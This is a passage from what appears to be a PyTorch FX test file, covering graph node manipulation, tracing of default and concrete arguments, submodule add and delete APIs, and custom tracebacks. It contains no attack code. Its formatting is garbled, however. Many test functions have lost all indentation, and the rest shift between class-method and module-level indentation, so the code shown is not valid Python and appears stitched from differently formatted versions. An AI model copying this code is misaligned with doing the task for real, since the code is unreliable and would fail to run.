        fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
    def test_fn_type_annotation_empty(self):
        """A traced function whose only annotation is on a list parameter remains scriptable."""
        def forward(a : List[torch.Tensor]):
            return a[0]
        torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
    def test_ctx_mgr(self):
        """forward() decorated with a contextmanager-based decorator still traces."""
        @contextlib.contextmanager
        def do_nothing():
            yield
        class M(torch.nn.Module):
            def __init__(self):
                super().__init__()
            @do_nothing()
            def forward(self, x):
                return torch.relu(x)
        m = M()
        self.checkGraphModule(m, (torch.rand(3, 4),))
    def test_typename_print(self):
        """A node's type_expr is rendered with its full typing qualified name in str(graph)."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
                                              type_expr=List[float])
        output : torch.fx.Node = graph.output(b)
        self.assertTrue('typing.List[float]' in str(graph))
    def test_ellipsis(self):
        """Slicing with Ellipsis (``...``) inside forward() traces correctly."""
        class M(torch.nn.Module):
            def __init__(self):
                super().__init__()
            def forward(self, x, y):
                return x + y[:, 1:10, ...]
        traced = symbolic_trace(M())
        x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
        self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
    def test_inf_nan_kwds(self):
        """Graphs built manually with inf/nan constant args generate valid code."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
        c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
        graph.output((b, c))
        gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        x = torch.rand(3, 4)
        self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
    def test_deepcopy_recursion_depth(self):
        """deepcopy of a graph deeper than the recursion limit succeeds and
        preserves the users relationships node-for-node."""
        depth = sys.getrecursionlimit() + 20
        g = torch.fx.Graph()
        x = g.placeholder('x')
        # Build a chain long enough that naive recursive copying would overflow.
        for i in range(depth):
            x = g.call_function(torch.relu, (x,))
        g.output(x)
        copied_graph = copy.deepcopy(g)
        val_map = {}
        for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
            val_map[orig_node] = new_node
        for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
            orig_users = set(orig_node.users.keys())
            orig_users_equiv = set(val_map[u] for u in orig_users)
            new_users = set(new_node.users.keys())
            self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
    def test_replace_input(self):
        """Node.replace_input_with rewires a single input of one node."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        y : torch.fx.Node = graph.create_node('placeholder', 'y')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
        output : torch.fx.Node = graph.output(b)
        b.replace_input_with(x, y)
        gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        input_x = torch.randn(33, 44)
        input_y = torch.randn(11, 22)
        # relu now consumes y, so only input_y affects the result.
        self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
    def test_insertion_point(self):
        """graph.inserting_before places newly created nodes ahead of a given node."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
        output : torch.fx.Node = graph.output(b)
        with graph.inserting_before(b):
            neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
            # Rewire relu to consume the new neg node.
            _, *relu_args = b.args
            b.args = (neg, *relu_args)
        gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        input = torch.randn(33, 44)
        self.assertEqual(gm(input), torch.relu(torch.neg(input)))
    def test_update_args_api(self):
        """Node.update_arg replaces a positional argument in place."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        y : torch.fx.Node = graph.create_node('placeholder', 'y')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
        output : torch.fx.Node = graph.output(b)
        orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
        self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
        # Swap relu's arg 0 from x to y and recompile.
        b.update_arg(0, y)
        new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
    def test_update_kwargs_api(self):
        """Node.update_kwarg replaces a keyword argument in place."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        y : torch.fx.Node = graph.create_node('placeholder', 'y')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
        output : torch.fx.Node = graph.output(b)
        orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
        self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
        # Swap relu's 'input' kwarg from x to y and recompile.
        b.update_kwarg('input', y)
        new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
    def test_move_before(self):
        """Node.prepend moves an already-created node before another, restoring topo order."""
        graph : torch.fx.Graph = torch.fx.Graph()
        x : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
        output : torch.fx.Node = graph.output(b)
        # neg is appended at the end, then relu is rewired to use it...
        neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
        _, *relu_args = b.args
        b.args = (neg, *relu_args)
        # ...and prepend moves neg before relu so the graph stays well-ordered.
        b.prepend(neg)
        gm = torch.fx.GraphModule(torch.nn.Module(), graph)
        input = torch.randn(33, 44)
        self.assertEqual(gm(input), torch.relu(torch.neg(input)))
    def test_erase_node_error(self):
        """erase_node on a node that still has users raises a descriptive RuntimeError."""
        st = SimpleTest()
        traced = symbolic_trace(st)
        for node in traced.graph.nodes:
            # Test deleting with uses both in another Node and at the output
            if node.target in [operator.add, torch.relu]:
                with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
                    traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
    def test_get_torch_func_signature(self):
        """get_signature_for_torch_op runs without error over every callable in the torch namespace."""
        for key in dir(torch):
            obj = getattr(torch, key)
            if callable(obj):
                # Result intentionally unused; this is a smoke test for crashes.
                schemas = get_signature_for_torch_op(obj)
    def test_find_uses(self):
        """Node.users tracks all consumers of a node across different op kinds."""
        graph = torch.fx.Graph()
        x = torch.fx.Proxy(graph.placeholder('x'))
        y = torch.relu(x)
        z = x + x
        u = torch.neg(x)
        graph.output((y + z + u).node)
        graph.lint()
        users_of_x = x.node.users
        # x feeds relu once, add once (both operands count as one user), neg once.
        self.assertEqual(len(users_of_x), 3)
        expected_ops = set(['relu', 'add', 'neg'])
        for use in users_of_x:
            assert any(use.name.startswith(prefix) for prefix in expected_ops)
    def test_inline_graph(self):
        """graph_copy with a val_map stitches one traced graph onto another's output."""
        class InlineInto(torch.nn.Module):
            def forward(self, x):
                return torch.relu(x)
        class ToInline(torch.nn.Module):
            def forward(self, x):
                return torch.neg(x)
        inline_into = symbolic_trace(InlineInto())
        to_inline = symbolic_trace(ToInline())
        combined_graph = torch.fx.Graph()
        output_node = combined_graph.graph_copy(inline_into.graph, {})
        input_node = list(to_inline.graph.nodes)[0]
        assert input_node and input_node.op == 'placeholder'
        # Map ToInline's placeholder onto InlineInto's output to chain the graphs.
        val_map = {input_node : output_node}
        output = combined_graph.graph_copy(to_inline.graph, val_map)
        combined_graph.output(output)
        combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
        input = torch.rand(3, 4)
        self.assertEqual(combined_module(input), input.relu().neg())
    def test_multi_insert_point(self):
        """Multiple nodes created under one inserting_before context all land before the anchor, in creation order."""
        graph = torch.fx.Graph()
        x = torch.fx.Proxy(graph.placeholder('x'))
        relu = torch.relu(x)
        with graph.inserting_before(relu.node):
            y = torch.neg(x)
            z = torch.tanh(y)
        graph.output((relu.node, z.node))
        graph.lint()
        # neg and tanh were inserted before relu despite being created after it.
        expected_ops = ['x', 'neg', 'tanh', 'relu']
        for node, expected in zip(graph.nodes, expected_ops):
            assert expected in node.name
    def test_reassign_args_kwargs_uses(self):
        """Assigning Node.args directly updates the users bookkeeping of old and new inputs."""
        graph = torch.fx.Graph()
        x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
        z = x + y
        zed = z + z + z
        graph.output(zed.node)
        graph.lint()
        # zed = z + z + z -> zed = z + z + x
        zed.node.args = (zed.node.args[0], x.node)
        self.assertEqual(x.node.users.keys(), [z.node, zed.node])
        # z = x + y -> z = y + y
        z.node.args = (y.node, y.node)
        # x's only remaining user is zed (z no longer reads x).
        self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
    def test_trace_dict_int_keys(self):
        """A dict with concrete (int) keys and Proxy values may be passed to a leaf module."""
        class ModWithDictArg(torch.nn.Module):
            def forward(self, d : Dict[int, torch.Tensor]):
                return d[42]
        class CallsModWithDict(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.m = ModWithDictArg()
            def forward(self, x):
                return self.m({42: x})
        class MyTracer(torch.fx.Tracer):
            def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
                # Keep the dict-consuming module opaque so the dict is a call arg.
                return isinstance(m, ModWithDictArg)
        traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
    """A dict argument keyed by a Proxy must be rejected during tracing."""
    class ModWithDictArg(torch.nn.Module):
        def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
            return d[42]

    class CallsModWithDict(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.m = ModWithDictArg()

        def forward(self, x):
            # `x` is a Proxy at trace time, so this dict key is a Node.
            return self.m({x: x})

    class MyTracer(torch.fx.Tracer):
        def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
            return isinstance(m, ModWithDictArg)

    with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
        traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
    """Direct use of a nested module's Parameter traces as attribute access.

    None of the resulting nodes should be materialized tensor constants
    (targets named like `_tensor_constant*`).
    """
    class TransposeTest(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.b = torch.nn.Parameter(torch.rand(4, 3))

        def forward(self, x):
            return self.b

    class Foo(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.a = TransposeTest()

        def forward(self, x):
            # Access the nested parameter directly and through methods.
            return self.a.b, self.a.b.t(), self.a.b.view(12)

    traced = torch.fx.symbolic_trace(Foo())
    assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
    """Tracing honors a forward() with one defaulted argument."""
    class M(torch.nn.Module):
        def __init__(self):
            super().__init__()

        def forward(self, y=1):
            return y

    mod = M()
    # Exercise both the defaulted and the explicit call shapes.
    for call_args in ((), (3,)):
        self.checkGraphModule(mod, call_args)
def test_multiple_default_args(self):
    """Tracing honors a forward() with two defaulted arguments."""
    class M(torch.nn.Module):
        def __init__(self):
            super().__init__()

        def forward(self, y=1, z=2):
            return y + z

    mod = M()
    # Zero, one, and two explicit arguments.
    for call_args in ((), (3,), (3, 4)):
        self.checkGraphModule(mod, call_args)
def test_regular_and_default_args(self):
    """Tracing honors a mix of required and defaulted forward() arguments."""
    class M(torch.nn.Module):
        def __init__(self):
            super().__init__()

        def forward(self, x, y=1):
            return x + y

    mod = M()
    for call_args in ((2,), (2, 3)):
        self.checkGraphModule(mod, call_args)
def test_string_literal_return(self):
    """A forward() returning a bare string literal traces correctly."""
    class M(torch.nn.Module):
        def __init__(self):
            super().__init__()

        def forward(self):
            return "foo"

    self.checkGraphModule(M(), ())
def test_namedtuple_return_qualname(self):
    """A traced module may return a (module-level) NamedTuple instance."""
    class NamedTupReturn(torch.nn.Module):
        def forward(self, x):
            return MyNamedTup(x, x)

    traced = symbolic_trace(NamedTupReturn())
    input = torch.rand(3, 4)
    self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
    """The private Node.__update_args_kwargs must not be reachable externally."""
    symtraced = symbolic_trace(SimpleTest())
    node = next(iter(symtraced.graph.nodes))
    # Name mangling means outside code sees an AttributeError.
    with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
        node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
    """A TorchBind custom-class attribute survives tracing (no-arg method call)."""
    if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
        # Custom-class registration is unavailable on these platforms.
        self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")

    class FooBar1234(torch.nn.Module):
        def __init__(self):
            super(FooBar1234, self).__init__()
            self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])

        def forward(self):
            return self.f.top()

    m = FooBar1234()
    self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
    """A TorchBind custom-class method taking a Tensor traces as call_method."""
    if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
        # Custom-class registration is unavailable on these platforms.
        self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")

    class FooBar2341(torch.nn.Module):
        def __init__(self):
            super(FooBar2341, self).__init__()
            self.f = torch.classes._TorchScriptTesting._ReLUClass()

        def forward(self, x):
            return self.f.run(x)

    m = FooBar2341()

    traced = symbolic_trace(m)
    input = torch.randn(3, 4)
    self.assertEqual(traced(input), m(input))
    # The custom-class call must appear as a call_method node.
    self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
    """A scripted submodule is kept opaque and traced as a call_method node."""
    class Scripted(torch.nn.Module):
        def forward(self, x):
            return torch.relu(x)

    class Holder(torch.nn.Module):
        def __init__(self):
            super().__init__()
            # jit.script produces a ScriptModule attribute.
            self.s = torch.jit.script(Scripted())

        def forward(self, x):
            return self.s(x)

    h = Holder()
    traced = symbolic_trace(h)
    input = torch.randn(3, 4)
    self.assertEqual(traced(input), h(input))
    self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
    """A traced module may return a NamedTuple (`Pair`) and round-trip it."""
    class NamedTupReturn(torch.nn.Module):
        def forward(self, x):
            return Pair(x, x)

    traced = symbolic_trace(NamedTupReturn())
    input = torch.rand(3, 4)
    self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
    """Return-type annotations survive tracing and subsequent scripting."""
    class ReturnTypeModule(torch.nn.Module):
        def other(self, x: List[str]) -> List[str]:
            return x

        def forward(self, x: List[str]) -> List[str]:
            return self.other(x)

    traced = symbolic_trace(ReturnTypeModule())
    # Generated code spells typing names with a `typing_` prefix.
    self.assertIn("-> typing_List[str]", traced._code)
    scripted = torch.jit.script(traced)
    self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
    """Shared body for the __getitem__ tracing tests (see test_getitem*).

    Exercises slicing with a traced size, indexing with a traced size, and
    indexing with a constant (which creates a tensor constant attribute).
    """
    class GetItemBase(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.register_buffer('pe', torch.randn(8, 8))

    class GetItem1(GetItemBase):
        def forward(self, x):
            return self.pe[:, :x.size(0)]

    class GetItem2(GetItemBase):
        def forward(self, x):
            return self.pe[x.size(0)]

    class GetItem3(GetItemBase):
        def forward(self, x):
            return self.pe[4]  # fx creates `self._tensor_constant0` here

    self.checkGraphModule(GetItem1(), [torch.zeros(4)])
    self.checkGraphModule(GetItem2(), [torch.zeros(4)])
    self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
                     "Will be checked in test_getitem_subproc")
def test_getitem(self):
    """Run getitem_inner directly; only active when FX_PATCH_GETITEM=1."""
    self.getitem_inner()
def test_getitem_subproc(self):
    """Run the getitem tests in a child process.

    # need to run this test in a subproc to work around:
    # https://github.com/pytorch/pytorch/issues/50710
    """
    proc = Process(target=run_getitem_target)
    proc.start()
    proc.join()
    # Exit code 0 means every assertion in the subprocess passed.
    self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
    """Scripting a traced function reports where the wrapped call came from."""
    def fn(x):
        return wrapper_fn(x)

    traced = torch.fx.symbolic_trace(fn)

    # The error message should name both the wrapped fn and its call site.
    with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
                                "being compiled since it was called"
                                " from 'fn.forward'"):
        scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
    """Same as the function variant, but the call site is a Module.forward."""
    class M(torch.nn.Module):
        def forward(self, x):
            return wrapper_fn(x)

    traced = torch.fx.symbolic_trace(M())

    with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
                                "being compiled since it was called"
                                " from 'M.forward'"):
        scripted = torch.jit.script(traced)
def test_snake_case(self):
    """Node names are snake_cased while targets keep the original spelling."""
    class M(torch.nn.Module):
        def __init__(self):
            super(M, self).__init__()
            self.activations = torch.nn.ModuleDict([
                ["snake_case", torch.nn.ReLU()],
                ["PascalCase", torch.nn.LeakyReLU()],
                ["ALL_CAPS", torch.nn.PReLU()]
            ])

        def forward(self, x):
            a = self.activations["snake_case"](x)
            b = self.activations["PascalCase"](x)
            c = self.activations["ALL_CAPS"](x)
            return a, b, c

    traced = symbolic_trace(M())

    # (expected node name, expected node target) pairs in graph order.
    check = [
        ("activations_snake_case", "activations.snake_case"),
        ("activations_pascal_case", "activations.PascalCase"),
        ("activations_all_caps", "activations.ALL_CAPS")
    ]

    i = 0
    for node in traced.graph.nodes:
        if node.op == "placeholder" or node.op == "output":
            continue
        name = check[i][0]
        target = check[i][1]
        self.assertEqual(name, node.name)
        self.assertEqual(target, node.target)
        i += 1
    # All three call_module nodes must have been seen.
    self.assertEqual(i, 3)
def test_no_mutation(self):
    """immutable_list rejects item assignment."""
    from torch.fx.immutable_collections import immutable_list
    frozen = immutable_list([3, 4])
    with self.assertRaisesRegex(NotImplementedError, "new_args"):
        frozen[0] = 4
def test_partial_trace(self):
    """concrete_args specializes a traced callable on a constant input.

    Tracing with `y` fixed to True/False burns the taken branch into the
    graph and inserts a torch._assert node guarding the specialized value,
    so calling with the other value raises AssertionError.
    """
    class Foo(torch.nn.Module):
        def forward(self, x, y):
            if y:
                return 2 * x
            else:
                return x

    mod = Foo()
    mod_true = symbolic_trace(mod, concrete_args={'y': True})
    mod_false = symbolic_trace(mod, concrete_args={'y': False})
    self.assertEqual(mod_true(3, True), 6)
    # Fixed: removed leftover debug `print(mod_true.code)`; use a generator
    # instead of materializing a list inside any().
    assert any(i.target == torch._assert for i in mod_true.graph.nodes)
    with self.assertRaises(AssertionError):
        mod_true(3, False)
    self.assertEqual(mod_false(3, False), 3)
    with self.assertRaises(AssertionError):
        mod_false(3, True)

    # concrete_args can also specialize a higher-order function argument.
    def f_higher(a, f):
        return f(a)

    nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
    self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
    """Errors from the generated forward get the FX call-site banner.

    A `relu` call_method node is inserted before the output; calling the
    module with an int then fails inside the generated code, and stderr
    must carry the "Call using an FX-traced Module" banner.
    """
    class M(torch.nn.Module):
        def __init__(self):
            super(M, self).__init__()
            self.W = torch.nn.Parameter(torch.randn(5))

        def forward(self, x):
            return torch.dot(self.W, x)

    traced = torch.fx.symbolic_trace(M())

    out = [n for n in traced.graph.nodes if n.op == "output"][-1]
    with traced.graph.inserting_before(out):
        relu_out = traced.graph.call_method(method_name='relu',
                                            args=(out.args[0],))
    out.args = (relu_out,)

    traced.recompile()

    with self.capture_stderr() as captured:
        with self.assertRaises(TypeError):
            # `5` is not a Tensor, so torch.dot raises inside generated code.
            traced(5)

    self.assertRegex(captured[0],
                     r"Call using an FX-traced Module, line .* of the "
                     r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
    """Errors raised inside a real submodule keep the ordinary traceback.

    The FX-specific "Call using an FX-traced Module" banner must only be
    added when the generated forward itself is the source of the error.
    """
    class M(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.linear = torch.nn.Linear(3, 4)

        def forward(self, x):
            return self.linear(x)

    traced = torch.fx.symbolic_trace(M())

    # Do not change this to `capture_stderr` or another context
    # manager without ensuring that the output is as expected
    try:
        # Shape mismatch: Linear expects 3 input features, gets 5.
        traced(torch.rand(5, 5))
    except RuntimeError:
        captured = traceback.format_exc()
    else:
        # Fixed: previously `captured` was unbound on the no-raise path,
        # which masked the real problem behind a NameError below.
        self.fail("expected the shape-mismatched call to raise RuntimeError")

    self.assertNotRegex(captured,
                        r"Call using an FX-traced Module, line .* of the "
                        r"traced Module's generated forward function:")
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
    """End-to-end exercise of GraphModule's submodule manipulation API.

    Covers add_submodule / delete_submodule / delete_all_unused_submodules,
    get_submodule / get_parameter / get_buffer (including their error
    cases), graph surgery to swap a conv node for a dropout node, and the
    warning for get_attr nodes without a backing attribute.
    """
    class C(torch.nn.Module):
        def __init__(self):
            super(C, self).__init__()
            self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
            self.param = torch.nn.Parameter(torch.rand(2, 3))

        def forward(self, x):
            return self.conv(torch.cat([self.param, x]))

    class B(torch.nn.Module):
        def __init__(self):
            super(B, self).__init__()
            self.linear = torch.nn.Linear(100, 200)
            self.register_buffer("buf", torch.randn(2, 3))
            self.net_c = C()

        def forward(self, x):
            return self.linear(torch.cat([self.buf, self.net_c(x)]))

    class A(torch.nn.Module):
        def __init__(self):
            super(A, self).__init__()
            self.net_b = B()
            self.param = torch.nn.Parameter(torch.rand(2, 3))

        def forward(self, x):
            return self.net_b(x) + self.param

    a = symbolic_trace(A())

    a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))

    # Replace the conv node with a call to the new dropout submodule.
    conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
    with a.graph.inserting_before(conv):
        dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
                                      args=conv.args)

    conv.replace_all_uses_with(dropout)
    a.graph.erase_node(conv)

    a.recompile()

    def module_exists(gm: GraphModule, path: str) -> bool:
        return any(path == name for name, _ in gm.named_modules())

    def parameter_exists(gm: GraphModule, path: str) -> bool:
        return (any(path == name for name, _ in gm.named_parameters())
                and any(path == name for name in gm.state_dict().keys()))

    def buffer_exists(gm: GraphModule, path: str) -> bool:
        return (any(path == name for name, _ in gm.named_buffers())
                and any(path == name for name in gm.state_dict().keys()))

    # Test that we added the "dropout" submodule
    self.assertTrue(module_exists(a, "net_b.net_c.dropout"))

    # Test `get_submodule` with an added submodule
    self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))

    # Test that the "conv" submodule is still there
    self.assertTrue(module_exists(a, "net_b.net_c.conv"))

    # Test `get_submodule` with an original module
    self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))

    # Test that the "conv" node is NOT still there
    conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
    self.assertEqual(conv, [])

    a.delete_submodule("net_b.net_c.conv")

    # Test that the "conv" submodule is now gone
    self.assertFalse(module_exists(a, "net_b.net_c.conv"))

    # Test `get_submodule` with a deleted submodule
    with self.assertRaisesRegex(AttributeError, "has no attribute "
                                "`conv`"):
        self.assertIsNone(a.get_submodule("net_b.net_c.conv"))

    # Test `get_attr` warnings
    cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]

    with a.graph.inserting_before(cat):
        # A get_attr with a real backing attribute must not warn.
        with warnings.catch_warnings(record=True) as w:
            param = a.graph.get_attr(qualified_name="net_b.net_c.param")
            self.assertEqual(len(w), 0)

        # A get_attr with no backing attribute must warn.
        with self.assertWarnsRegex(UserWarning, "Attempted to "
                                   "insert a get_attr Node with no "
                                   "underlying reference in the "
                                   "owning GraphModule"):
            bad_param = a.graph.get_attr(qualified_name="net_b.param")
            a.graph.erase_node(bad_param)

    cat.args = (*cat.args, param)

    a.recompile()

    a.graph.lint()

    # Test `get_parameter`
    a.get_parameter("net_b.net_c.param")
    with self.assertRaisesRegex(AttributeError, "is not an "
                                "nn.Parameter"):
        a.get_parameter("net_b.buf")
    with self.assertRaisesRegex(AttributeError, "has no attribute "
                                "`param`"):
        a.get_parameter("net_b.param")

    # Test `get_buffer`
    a.get_buffer("net_b.buf")
    with self.assertRaisesRegex(AttributeError, "is not a "
                                "buffer"):
        a.get_buffer("net_b.net_c.param")
    with self.assertRaisesRegex(AttributeError, "has no attribute "
                                "`buf`"):
        a.get_buffer("net_b.net_c.buf")

    # Test non-nested attributes
    a.get_submodule("")
    a.get_parameter("param")

    # Insert some unused submodules
    a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
    a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
    a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
    a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))

    # Garbage collection
    a.delete_all_unused_submodules()

    # Test that all the unused submodules are gone
    self.assertFalse(module_exists(a, "net_b.embedding"))
    self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
    self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
    self.assertFalse(module_exists(a, "batch_norm_2d"))

    # Test that we didn't delete any unused Parameters or buffers
    self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
    self.assertTrue(buffer_exists(a, "net_b.buf"))

    a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
    """Shared body: GraphModule construction must copy buffers and params.

    Args:
        use_dict_init: when True, construct the new GraphModule from a plain
            dict of attributes; otherwise from the original root module.
    """
    class MyModule(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.register_buffer("my_buff", torch.rand(3, 4))
            self.register_parameter(
                "my_param", torch.nn.Parameter(torch.rand(3, 4))
            )

        def forward(self, x):
            return x + self.my_buff + self.my_param

    mod = MyModule()
    mod_traced = symbolic_trace(mod)

    # Create new GraphModule based on original, either w/ dict or root module.
    orig_buff = mod_traced.get_buffer("my_buff")
    orig_param = mod_traced.get_parameter("my_param")
    mod_traced_new = GraphModule(
